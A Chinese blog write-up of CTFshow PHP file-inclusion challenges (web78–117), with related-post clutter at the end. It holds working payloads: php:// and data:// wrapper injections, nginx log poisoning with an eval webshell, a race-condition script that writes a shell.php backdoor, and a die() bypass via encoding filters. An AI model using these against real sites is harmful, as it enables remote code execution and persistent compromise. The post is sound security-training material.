CTFshow-web入门-include-web78-117

已于 2024-07-17 23:43:33 修改
阅读量617 收藏 22
点赞数 17
文章标签: 前端 android web安全 php
于 2024-07-17 23:25:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72655585/article/details/140508269
版权

前言

主要考察是php伪协议,之前Rce里也有提过,这里放几个常用Payload

php://filter/read=convert.base64-encode/resource=index.php

data://text/plain;base64,xxxx(base64编码后的数据)

php://filter/convert.iconv.UTF-8.UTF-7/resource=flag.php

php://input
POST cmd

web78-117

web78(php)

签到

Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

web79(data)
$file = str_replace("php", "???", $file);

将php过滤,可以考虑data

Payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
web80(nginx日志注入)
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);

data也被ban了

使用nginx日志文件包含,在User-Agent写入一句话木马,使用蚁剑连接https://xxx.ctfshow?file=/var/log/nginx getshell

Payload:

?file=/var/log/nginx/access.log

User-Agent: <?php @eval($_POST['attack']);?>

看题解也可以大小写绕过用PHP://input

web81

多过滤了冒号,所以依旧可以nginx日志注入

web82(利用session.upload_progress进行文件包含)

利用session.upload_progress进行文件包含和反序列化渗透

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

如果session.auto_start=On ,则PHP在接收请求的时候会自动初始化Session,不再需要执行session_start()。但默认情况下,这个选项都是关闭的。但session还有一个默认选项,session.use_strict_mode默认值为0。此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=TGAO,PHP将会在服务器上创建一个文件:/tmp/sess_TGAO”。即使此时用户没有初始化Session,PHP也会自动初始化Session。 并产生一个键值,这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。

但是问题来了,默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空,

此时我们可以利用竞争,在session文件内容清空前进行包含利用。

session文件默认存储路径

/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

方法一:

先以POST的形式发包,上传的文件随意,下面是构造的上传表单

<!DOCTYPE html>
<html>
<body>
<form action="http://79b5dbc7-b641-4e30-b8d9-4278f2234938.chall.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

使用burp进行爆破(两个要同时爆破)

在这里插入图片描述

在这里插入图片描述

最后竞争得到flag

方法二:

可以利用脚本进行条件竞争

import io
import sys
import requests
import threading

sessid = 'Qftm'
url = 'https://2fdf78b8-ded3-49bb-8ebc-1bc7fac6b480.challenge.ctf.show/'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[mtfQ])?>');?>"},
            files={"file":('q.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{url}?file=/tmp/sess_{sessid}')
        if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)
web83

条件竞争同上

web84

添加了如下代码

system(“rm -rf /tmp/*”);

// 在 rm -rf /tmp/* 执行之后立刻有新的请求创建了 sess_shell 文件 条件竞争依然有效

web85

添加了一个内容识别,如果有<就die,依旧可以竞争。

web86

dirname(FILE)表示当前文件的绝对路径。set_include_path函数,是用来设置include的路径的,就是include()可以不提供文件的完整路径了。
include文件时,当包含路径既不是相对路径,也不是绝对路径时(如:include(“test.php”)),会先查找include_path所设置的目录。
脚本里用的是完整路径,不影响竞争。

web87(file_put_contents)

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}

file_put_contents() 函数把一个字符串写入文件中。

PHP file_put_contents() 函数

file_put_content和死亡·杂糅代码之缘

参考大佬文章,可以使用base64或者rot13来进行对前面代码进行杂糅

首先构造$file,因为要对file进行一次url解码所以我们对payload进行两次url编码

晚上大多工具是对英文字符不进行url编码的,所以这里给出脚本方便进行urlencode

import urllib.parse


def encode_char(char):
    # 指定字符集,转换为ASCII码后,再转换为16进制,并添加%
    special_chars = "!#$&'()*+,/:;=?@-._~0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    if char in special_chars:
        # 转换为ASCII码,然后转换为16进制,并添加%
        return '%{:02x}'.format(ord(char))
    else:
        # 对其他字符进行URL编码
        return urllib.parse.quote(char)


def url_encode(input_string):
    # 对字符串中的每个字符进行编码
    return ''.join(encode_char(char) for char in input_string)


input_string = "Test"
encoded_string = url_encode(input_string)
print(encoded_string)

php://write=convert.base64-decode/resource=hsad.php

两次编码后得到

file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%38%25%37%33%25%36%31%25%36%34%25%32%65%25%37%30%25%36%38%25%37%30

然后进行Post content

base64可以绕过die函数。因为base64编码范围是 0 ~ 9,a ~ z,A ~ Z,+,/ ,所以除了这些字符,其他字符都会被忽略掉。

base64过滤之后就只有(phpdie)6个字符了,base64要求把每三个8Bit的字节转换为四个6Bit的字节,所以这里也要凑够四个字节的倍数,避免base64解码出问题,这里加上两个字符即可。

​ <?php system("tac fl0g.php");?>

content=aaPD9waHAgc3lzdGVtKCJ0YWMgZmwwZy5waHAiKTs/Pg==

web88

发现过滤的还是比较多,但是没有过滤 : 那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;base64,poc 其实和79差不多 只是注意的是编码成base64的时候要去掉 =

web116

访问网页给了视频,formost分解出来有图片是网站源码

在这里插入图片描述

然后直接访问flag.php就行,说实话有点懵,因为过滤挺狠的

web117

参考文章:

谈一谈php://filter的妙用

php://filter的各种过滤器

这道题过滤了rot13,base64,string等一些过滤器的内容,那换其他过滤器不就完事了。

这里我们用convert.iconv.*这个过滤器。

payload:

GET: ?file=php://filter/convert.iconv.ucs-2be.ucs-2le/resource=a.php

UCS-2LE编码转换为UCS-2BE编码

POST: contents=?<hp pvela$(G_TE’['a)] ;>?

薄荷色草地芬芳像风没有形状
关注
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1161
ctfshow-web入门-爆破wp
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 943
ctfshow,命令执行,web31
CTFshow-web入门-php-web89-150
m0_72655585的博客
07-17 1524
也就是说,当给intval()函数传入一个非空的数组时,intval()函数将会返回1,结合我们preg_match()传入数组返回false的特性,这道题的payload就很清楚了。在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换。system(‘FLASE’),空指令,失败返回FLASE。
ctfshow-web入门-命令执行(web30-web36)
Welcome To Myon'Blog !
06-06 1145
命令执行,需要严格的过滤。
ctfshow-web入门(29~40)
1ance's blog
06-10 780
命令执行web29web30web31web32web33web34-36web37web38 web29 题目只过滤了关键词flag,用通配符即可绕过 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 官方题解: e
CTFshow--web入门--爆破
qq_46874275的博客
04-20 661
~目录~web21 Custom iterator(Base64加密)web22 子域名web23 MD5加密web24 web21 Custom iterator(Base64加密) 发现账号密码被Base64加密了,通过解密得知账号密码的形式为 账号:密码 抓包,添加$ 选择Payload type为Custom iterator,在Position1添加admin:(这里其实我们不知道账号为admin,正常爆破时间太长,看了大佬的wp知道账号为admin,我们就只爆破密码了) 在Position
CTFshow-web入门-rce-web29-124
m0_72655585的博客
07-17 2351
systemexecpassthrushell_execinclude(文件包含漏洞,配合php伪协议)
ctfshow-Web入门-sherlock
m0_58327783的博客
04-13 572
信息泄露可以参考https://blog.csdn.net/a597934448/article/details/105431367。
ctfshow-web入门-命令执行(web37-web40)
Welcome To Myon'Blog !
06-07 1935
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
ctfshow-WEB-web4
热门推荐
wangyuxiang946的博客
08-20 1万+
ctf.show WEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell; 然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell 页面最明显的位置展示了源码的核心,提示我们利用文件包含漏洞 包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行...
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1143
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 311
ctfshow,命令执行,web30
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 677
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
一些常用的react hooks以及各自的作用
weixin_48602044的博客
11-01 434
关于react hooks的一些知识与应用
Webserver(3.3)生产者消费者模型
学习历程记录和分享
11-05 242
解决该问题需要用互斥量确保线程同步,用条件变量或者信号量去解决生产者和消费者之间同步的问题,生产者把数据生产满了要通知消费者去消费。会产生数据安全问题,比如生产者还未生产出来,就去消费。
vxe-grid ,增加新行,并且定位到新增的行
花花鱼的专栏
11-05 169
vxe-grid新增空行,并且定位到空行位置。
前端react常见面试题目(basic)
警警的博客
11-02 1010
react常见面试题目(basic)
前端性能优化2
最新发布
Cwhat的博客
11-06 366
常见问题:首屏速度,白屏时间等。操作速度以及渲染速度。一打开网页时白屏,是因为还需要从服务器那边请求HTML、JS这些过来,加载下来后才有东西渲染首屏速度参考两方面:白屏时间(资源加载时间、首屏js执行)、渲染页面(首屏数据请求、Dom渲染)渲染页面是比较快的,所以大多数时间是花在了白屏时间上,而其中的资源加载时间是占比比较大的。
基于 SpringBoot 实现QQ邮箱验证码注册功能
2301_79201049的博客
11-06 362
找到并开通以下的邮件协议服务,而且服务开启也较为简单,需要我们发送一个短信到指定的号码,开启后平台会提供一个授权码,一定要记住这个授权码,发邮件的时候需要这个。host 是根据服务主机区分,网易邮箱是 smtp.163.com, qq邮箱是 smtp.qq.com。其中的 username 是你第一步中操作的邮箱账号,nickname 是接收者收到邮件中显示的发件人。发送邮件的核心依赖是 mail ,由于该项目还涉及其他依赖就全都导进来了。(1)首先打开QQ邮箱,点击设置并来到账号页面。
U-Boot移植指南:从入门到实践详解
8. **include**:头文件集中地,包括配置头文件和体系结构相关的汇编文件。 9. **lib_xxxx**:体系结构相关的库文件,如ARM相关库存放在lib_arm中。 10. **net**:网络功能模块,涵盖了如BOOTP、TFTP、RARP和NFS等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值